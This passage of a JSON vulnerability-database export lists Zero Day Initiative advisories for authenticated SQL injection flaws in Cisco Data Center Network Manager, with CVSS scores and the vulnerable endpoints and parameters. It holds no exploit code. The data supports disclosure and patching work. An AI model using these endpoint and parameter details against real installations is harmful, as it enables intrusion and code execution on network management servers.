"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-054", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-054/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the filterStr parameter of the getLanEthernetStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanEthernetStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-080", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-080/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/inventory/zones service. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getZoneListByZoneNameAndParentId SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-055", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-055/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the zones endpoint. When parsing the filterStr parameter in the getZoneDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getZoneDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-106", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-106/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the VpcWSService/VpcWS service. When parsing the fifth parameter of the getVpcConsistentList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllVpcs SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-081", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-081/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:04", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/settings/vxlan service. When parsing the fabricName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager setVxlanProperties SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-096", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-096/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the detail endpoint. When parsing the serialNumber parameter in the getSwitchDbIdBySerialNumber method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchDbIdBySerialNumber SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-110", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-110/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco 
Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLengthES endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanStatEntities SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-069", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-069/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:50", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/smu/getjobs endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSMUTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-019", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-019/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network 
Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/licenses endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLicenses SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-031", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-031/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:45", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/health/getSyslogEventList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSyslogEventList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-026", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-026/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:19", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLengthES endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanStatEntities SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-070/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getVmHostData endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVmHostData SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-060", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-060/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getInterfacesBySwitch endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getInterfacesBySwitch SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-035", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-035/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center 
Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSwitchBandwidthStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchBandwidthStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-083", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-083/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclDataLength endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclDataLength SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-024/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/msm/sites service. When parsing the name parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager createSite SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 